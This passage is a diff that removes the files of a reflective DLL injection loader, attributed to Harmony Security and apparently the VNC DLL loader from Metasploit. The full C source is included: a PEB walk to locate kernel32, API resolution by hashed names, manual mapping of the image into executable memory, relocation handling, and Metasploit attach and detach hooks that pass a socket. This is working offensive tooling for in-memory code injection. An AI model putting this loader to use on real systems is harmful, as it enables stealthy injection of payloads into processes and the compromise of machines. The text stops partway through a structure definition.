{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//


@ -1,37 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
#define _VNCDLL_LOADER_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//


@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
